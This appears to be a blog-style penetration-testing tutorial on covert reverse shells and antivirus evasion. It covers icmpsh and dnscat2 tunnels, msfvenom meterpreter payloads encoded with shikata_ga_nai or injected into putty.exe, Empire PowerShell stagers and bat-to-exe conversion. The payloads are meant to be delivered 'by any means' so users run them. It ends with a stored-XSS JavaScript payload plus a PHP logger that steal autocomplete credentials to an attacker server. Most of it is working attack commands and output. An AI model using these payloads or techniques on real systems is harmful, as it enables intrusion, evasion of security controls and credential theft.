SingularityX

So far we have seen just common ways to gain a shell and using the most common tools however, there are time when you need to be quiet.

ICMP

This kind of technique is most succesfull for internal assessment but chances are that the egress filtering is more permissive that it should be and allows external pings.

The tool for this is HERE

You can find the compiled version of the tool and the source code, I would recommend that you should recompile the code so you will have a new signature.

For this exercise I changed the code a little bit  to be standalone with out any parameter.

Master

You will need a Linux box in order to have a proper connectivity you will need to execute this:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

Then you will have to run the master:

python icmpsh_m.py
missing mandatory options. Execute as root:
./icmpsh-m.py <source IP address> <destination IP address>

In our lab we will have something like:

python icmpsh_m.py 192.168.56.161 192.168.56.163

The master will keep listening.

Slave

By any means you will have to deliver the payload into the system.

Once the user executes the file you will see you connection back.

python icmpsh_m.py 192.168.56.161 192.168.56.163
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\tester\Desktop>whoami
whoami
tester-pc\tester

C:\Users\tester\Desktop>

Pros:

• Really small payload
• New signature every time you compile it

Cons:

• You need ICMP enabled and allowed
• Mostly internal assessment
• You need to know the IP of the client
• Too much noise

DNS

Another way to gain external and internal shell is using DNS protocol, for this to work properly you will need an authoritative DNS server so you can do recursive DNS queries.

The tool used was THIS

Like the previous tool I would suggest to compile the tool your self rather than using the precompiled versions.

For this example we will use the direct connection but I have tested using an authoritative DNS server and the results are way much better.

Master

This tool is written in Ruby you need to follow the next steps to compile it:

git clone https://github.com/iagox86/dnscat2.git
Cloning into ‘dnscat2’…
remote: Counting objects: 6508, done.
remote: Total 6508 (delta 0), reused 0 (delta 0), pack-reused 6508
Receiving objects: 100% (6508/6508), 3.79 MiB | 3.76 MiB/s, done.
Resolving deltas: 100% (4496/4496), done.

Using GEMS

cd dnscat2/server
gem install bundler
Fetching: bundler-1.15.3.gem (100%)
Successfully installed bundler-1.15.3
Parsing documentation for bundler-1.15.3
Installing ri documentation for bundler-1.15.3
Done installing documentation for bundler after 5 seconds
1 gem installed

Installing

bundle install
Don’t run Bundler as root. Bundler can ask for sudo if it is needed, and
installing your bundle as root will break this application for all non-root
users on this machine.
Fetching gem metadata from https://rubygems.org/………&#8230;
Fetching version metadata from https://rubygems.org/.
Fetching trollop 2.1.2
Installing trollop 2.1.2
Fetching salsa20 0.1.1
Installing salsa20 0.1.1 with native extensions
Fetching sha3 1.0.1
Installing sha3 1.0.1 with native extensions
Fetching ecdsa 1.2.0
Installing ecdsa 1.2.0
Using bundler 1.15.1
Bundle complete! 4 Gemfile dependencies, 5 gems now installed.
Use `bundle info [gemname]` to see where a bundled gem is installed.

There different ways to run it depending on the DNS server:

For authoritative DNS server:

ruby ./dnscat2.rb dnsserver.org

For raw DNS server:

ruby ./dnscat2.rb

In our lab this should look like:

ruby ./dnscat2.rb

New window created: 0
New window created: crypto-debug
dnscat2> Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = n/a]…

It looks like you didn’t give me any domains to recognize!
That’s cool, though, you can still use direct queries,
although those are less stealthy.

To talk directly to the server without a domain name, run:

./dnscat –dns server=x.x.x.x,port=53 –secret=82a0d6eebefa63bf06d008734d78e626

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

Slave

After the compilations (this is really important) you need to deliver the payload, for better execution you should probably change the code to do not require parameters.

For this PoC we will skip this step.

In the master you will see:

 

New window created: 1
Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:

> Fleecy Genome Pikey Bifold Khan Softy

To interact with this session you will use the command window

dnscat2> window 1
0 :: main [active]
crypto-debug :: Debug window for crypto stuff [*]
dns1 :: DNS Driver running on 0.0.0.0:53 domains = [*]
1 :: command (tester-PC) [encrypted, NOT verified] [*]
dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:

>> Fleecy Genome Pikey Bifold Khan Softy
This is a command session!

That means you can enter a dnscat2 command such as
‘ping’! For a full list of clients, try ‘help’.

command (tester-PC) 1>

To execute commands:

command (tester-PC) 1> shell
Sent request to execute a shell
command (tester-PC) 1> New window created: 2
Shell session created!

This will create a new session with a normal cmd.exe spawn.

dnscat2> windows
0 :: main [active]
crypto-debug :: Debug window for crypto stuff [*]
dns1 :: DNS Driver running on 0.0.0.0:53 domains = [*]
1 :: command (tester-PC) [encrypted, NOT verified]
2 :: cmd.exe (tester-PC) [encrypted, NOT verified] [*]
dnscat2>

Like before you will interact with it using window -i 

dnscat2> window -i 2
New window created: 2
history_size (session) => 1000
Session 2 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:

>> Push Ravel Wisp Wears Ware Befool
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don’t
see a prompt, try typing ‘pwd’ or something!

To go back, type ctrl-z.

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\tester>
cmd.exe (tester-PC) 2>

cmd.exe (tester-PC) 2> whoami
tester-pc\tester

C:\Users\tester>

To be honest using the payloads from previous sections are not real world due to the fact that many of the modern security controls can detect them (jus in some really insecure environments).

Metasploit Encoding

So far we have been using the normal MSFVENOM  without any more options, this tools improves every single day thanks to the security community and it has some really nice features like:

Some examples:

-i, –iterations <count> The number of times to encode the payload
-c, –add-code <path> Specify an additional win32 shellcode file to include
-x, –template <path> Specify a custom executable file to use as a template
-e, –encoder <encoder> The encoder to use

For our next example we will use the most common encoder shikata_ga_nai 

Encoding and Iterations

In order to encode our payload:

msfvenom -a x86 –platform Windows -p windows/meterpreter_reverse_https -e x86/shikata_ga_nai -i <NUMER> LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Lets go to the real world examples:

msfvenom -a x86 –platform Windows -p windows/meterpreter_reverse_https -e x86/shikata_ga_nai -i 2 LHOST=192.168.56.161 LPORT=443 -f exe > reverse_https_shik.exe
fatal: Not a git repository (or any of the parent directories): .git
Found 1 compatible encoders
Attempting to encode payload with 2 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 958065 (iteration=0)
x86/shikata_ga_nai succeeded with size 958095 (iteration=1)
x86/shikata_ga_nai chosen with final size 958095
Payload size: 958095 bytes
Final size of exe file: 1033216 bytes

We will fire up our listener like:

msfconsole

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

By any means you think convenient deliver the file to your testing box:

Assuming the user accidentally executes the file you will receive the connection back to your listener.

[*] https://192.168.56.161:443 handling request from 192.168.56.163; (UUID: 4od2bcay) Redirecting stageless connection from /JKZkzzm99vvKBcsEk5RbSwUgWlP0cMpjO97QVHDK0_Fpe-v_qjPUgZdbMVrZxh-9ubNVjYhvys9bxRY7ilNQ_11TyV with UA ‘Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko’
[*] https://192.168.56.161:443 handling request from 192.168.56.163; (UUID: 4od2bcay) Attaching orphaned/stageless session…
[*] Meterpreter session 1 opened (192.168.56.161:443 -> 192.168.56.163:49205) at 2017-08-14 13:06:52 +0100

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: tester-PC\tester
meterpreter >

Even after the execution the AV is still unaware of this.

Binary Template

Metasploit uses a default binary template to generate the payloads for many reasons this can be known by AVs. You can change this by any other binary in this scenario we will use PUTTY.

First we get the original binary

Using MSFVENOM  we use this template to create our encoded payload using the following options

-i, –iterations <count> The number of times to encode the payload
-x, –template <path> Specify a custom executable file to use as a template
-e, –encoder <encoder> The encoder to use
-k, –keep Preserve the template behavior and inject the payload as a new thread

In order to encode our payload:

msfvenom -a x86 –platform Windows -p windows/meterpreter_reverse_https -e x86/shikata_ga_nai -i <NUMER> LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -k -x <BINARY> -f exe > shell.exe

Lets go to the real world examples:

msfvenom -a x86 –platform Windows -p windows/meterpreter_reverse_https -e x86/shikata_ga_nai -i 2 LHOST=192.168.56.161 LPORT=443 -k -x putty.exe -f exe > reverse_https_template.exe
fatal: Not a git repository (or any of the parent directories): .git
Found 1 compatible encoders
Attempting to encode payload with 2 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 958065 (iteration=0)
x86/shikata_ga_nai succeeded with size 958095 (iteration=1)
x86/shikata_ga_nai chosen with final size 958095
Payload size: 958095 bytes
Final size of exe file: 1473024 bytes

By any means you think convenient deliver the file to your testing box:

Assuming the user accidentally executes the file you will receive the connection back to your listener.

[*] https://192.168.56.161:443 handling request from 192.168.56.163; (UUID: eiuiogox) Redirecting stageless connection from /SSFy6jrFtAs57zjuYH6g0gAVdTzt_-VPCkqLvXLkO_6NUDXq_gCQ with UA ‘Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko’
[*] https://192.168.56.161:443 handling request from 192.168.56.163; (UUID: eiuiogox) Attaching orphaned/stageless session…
[*] Meterpreter session 1 opened (192.168.56.161:443 -> 192.168.56.163:49234) at 2017-08-14 13:41:05 +0100

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: tester-PC\tester
meterpreter >

Even after the execution the AV does not detect this.

EMPIRE POWERSHELL

Nowadays the use of powershell is well known for security assessments most of the times powershell is restricted or denied. Foe those cases when is not there is a excellent tool called Powershell Empire it is really similar to metasploit however all the tools are in powershell and once you execute the payload interact with Windows is really straight forward action.

I will avoid the drama for downloading and installing the tool check the link above for all the details however, I will explain how to create the payload and the listener when I started looking for this information it was a collection of little parts everywhere.

A good documentation can be found here BLOG

We start the tool as:

./empire

After loading the screen should look like

=======================================
[Empire] Post-Exploitation Framework
=======================================
[Version] 2.0 | [Web] https://theempire.io
=======================================

_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
| |__ | \ / | | |_) | | | | |_) | | |__
| __| | |\/| | | ___/ | | | / | __|
| |____ | | | | | | | | | |\ \—-.| |____
|_______||__| |__| | _| |__| | _| `._____||___

 

267 modules currently loaded

0 listeners currently active

0 agents currently active

 

(Empire) >

For Empire you need to main components a Listener and Stager in metasploit world handler and payload but in here the order matters and you need to create first the listener then the stager.

Listener

You need to access the Listener area by typing:

listeners

There different types if you want to list them all you need to type uselistener and (TAB).

(Empire: listeners) > uselistener
dbx  http  http_com  http_foreign  http_hop  meterpreter

We will use the common HTTP

(Empire: listeners) > uselistener http
(Empire: listeners/http) > info

You can edit all the options I would suggest to change -enc to -EncodedCommand due to the fact that most of the AV have this as a signature.

set Launcher powershell -noP -sta -w 1 -EncodedCommand

Then you just execute the listener

(Empire: listeners/http) > execute
[*] Starting listener ‘http’
[+] Listener successfully started!
(Empire: listeners/http) >

Back to the main menu like

back

Stagers

In the main menu you can list all the stagers by typing usestager (TAB)

(Empire) > usestager
multi/bash osx/application osx/macho windows/bunny windows/launcher_sct
multi/launcher osx/ducky osx/macro windows/dll windows/launcher_vbs
multi/pyinstaller osx/dylib osx/pkg windows/ducky windows/macro
multi/war osx/jar osx/safari_launcher windows/hta windows/teensy
osx/applescript osx/launcher osx/teensy windows/launcher_bat

For this example we will use windows/launcher_bat

(Empire) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > info

Name: BAT Launcher

Description:
Generates a self-deleting .bat launcher for
Empire.

You can add proxy settings, User agent but the most important and mandatory field is Listener, in this case is our HTTP.

(Empire: stager/windows/launcher_bat) > set Listener http

After this we can generate the stager.

(Empire: stager/windows/launcher_bat) > generate

[*] Stager output written out to: /tmp/launcher.bat

By any means you think convenient deliver the file to your testing box:

The main difference between Metasploit listener and Empire is that the listener starts automatically.

(Empire: stager/windows/launcher_bat) > main
=========================================
[Empire] Post-Exploitation Framework
=========================================
[Version] 2.0 | [Web] https://theempire.io
=========================================

_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
| |__ | \ / | | |_) | | | | |_) | | |__
| __| | |\/| | | ___/ | | | / | __|
| |____ | | | | | | | | | |\ \—-.| |____
|_______||__| |__| | _| |__| | _| `._____||_____

 

267 modules currently loaded

1 listeners currently active

0 agents currently active

 

(Empire) >

Assuming the user accidentally executes the file you will receive the connection back to your listener.

(Empire) > [+] Initial agent VA13LK4P from 192.168.56.163 now active

(Empire) > agents

[*] Active agents:

Name Lang Internal IP Machine Name Username Process Delay Last Seen
——— —- ———– ———— ——— ——- —– ——————–
VA13LK4P ps 192.168.56.163 TESTER-PC tester-PC\tester powershell/3140 5/0.0 2017-08-14 14:22:42

(Empire: agents) >

The stager was configured to delete itself after execution and once again the AV hasn’t detected anything.

Bat to Exe

Actually using a bat file in real world is the most naive way to try to get access.

Over internet there are some tools which can help to transform BAT into EXE like:

We will use the same stager but we will convert it into Windows executable.

We will keep the defaults however, it is good to tailor it a bit.

Once again by any means deliver the payload into the system:

Assuming the user accidentally executes the file you will receive the connection back to your listener.

(Empire) > [+] Initial agent BMT2KW3A from 192.168.56.163 now active

(Empire) > agents

[*] Active agents:

Name Lang Internal IP Machine Name Username Process Delay Last Seen
——— —- ———– ———— ——— ——- —– ——————–
VA13LK4P ps 192.168.56.163 TESTER-PC tester-PC\tester powershell/3140 5/0.0 2017-08-14 14:45:53
BMT2KW3A ps 192.168.56.163 TESTER-PC tester-PC\tester powershell/2096 5/0.0 2017-08-14 16:08:49

(Empire: agents) >

So far we have seen medium level payloads in the following post we will look into the advanced ones and how we can bypass AV, whitelisting, and Proxies.

We will use the same two ways from the post Basics but we will add some functionality that helps when the proxy is not helping.

Stageless

According to Metasploit documentation we can use a stageless payload to have our connection back this means that rather than using two steps to connect the payload will try to connect straight to our listener.

Reverse HTTP/HTTPS

We will use HTTP as a template but all the possible stageless payloads at the moment this post was written are:

windows/meterpreter_reverse_http
windows/meterpreter_reverse_https
windows/meterpreter_reverse_ipv6_tcp
windows/meterpreter_reverse_tcp

Using HTTP will be:

msfvenom -p windows/meterpreter_reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Lets go to the real world examples:

msfvenom -p windows/meterpreter_reverse_http LHOST=192.168.56.161 LPORT=80 -f exe > reverse_http_stageless.exe
fatal: Not a git repository (or any of the parent directories): .git
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 958035 bytes
Final size of exe file: 1033216 bytes

We will fire up our listener like:

msfconsole

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

By any means you think convenient deliver the file to your testing box:

Assuming the user accidentally executes the file you will receive the connection back to your listener.

[*] http://192.168.56.161:80 handling request from 192.168.56.163; (UUID: bxl1z9zr) Redirecting stageless connection from /81-Xj9V9l7UFGwQaXIqE0QH1Mm-6vnekGrx4Dy2j8g63qmNW7F4kKKEaVxlUrju-XymEsKf91fM with UA ‘Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko’
[*] http://192.168.56.161:80 handling request from 192.168.56.163; (UUID: bxl1z9zr) Attaching orphaned/stageless session…
[*] Meterpreter session 1 opened (192.168.56.161:80 -> 192.168.56.163:49172) at 2017-08-14 11:58:59 +0100

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: tester-PC\tester

The main difference here is the use of stageless session, this is useful when the proxy checks the content of the header and body.

Pros:

• One step to connect
• Proxy settings gathered automatically
• Not well know by AVs

Cons:

• Clear-text communcations

Hi again, well this time we have a new way to use Cross Site Scripting and Auto complete vulnerabilities. Yes, my young padawans Auto complete is a vulnerability, which scanners mark in low-level; we need to focus in all your vulnerabilities.

 Here we go again, this web application is from internet,that  is for testing so we don’t have any problem with FBI or police so, we can do whatever we want.

 First we need auto complete function this can be found when you login into a web application.

After this if your application is like mine (so many times happen) there is a cross site scripting vulnerability, in this case we have a good one that is cross site scripting stored.

So we need to make a JavaScript that makes a form in a fly, after we need to make a script that gets data from our form and sends it to our server.

var frameset = document.createElement(‘frameset’);
var frame1 = document.createElement(‘frame’);
document.body.appendChild(frameset);
frame1.setAttribute(‘src’,’login.php’);
frameset.appendChild(frame1);

setTimeout(showLogin,1000);

function showLogin()
{
     var user = parent.frames[0].document.forms[0].elements[0].value;
     var pass = parent.frames[0].document.forms[0].elements[1].value;
     var data = ‘user:’+user+’ ‘+’pass:’ + pass;
     location.href=”yourphpscript.php?x=” + data;
}

Also we need a php script; this script needs to get our data and saves it in a file.

<?php
$data = $_GET[‘x’];
$all = “\n”.$data.”\n”.”******************”;
$file = “data.txt”;
$fp = fopen($file, “a”) or die(“Couldn’t open $file for login!”);
       fwrite($fp, $all) or die(“Couldn’t open new page!”);
       fclose($fp);
       header( ‘Location: otherpage’ ) ;
?>

Well maybe you’re asking about the action at this pint so we need just to click and send our payload to victim’s application.

We need to check our txt file in our hacking server, and…

So maybe you think the main vulnerability is XSS, well you’re wrong the main is auto complete because that little thing doesn’t have an idea about security like us so it sends information without asking us.

Just remember, eggness comes with insecurity.

Thanks to [email protected] for his apache server.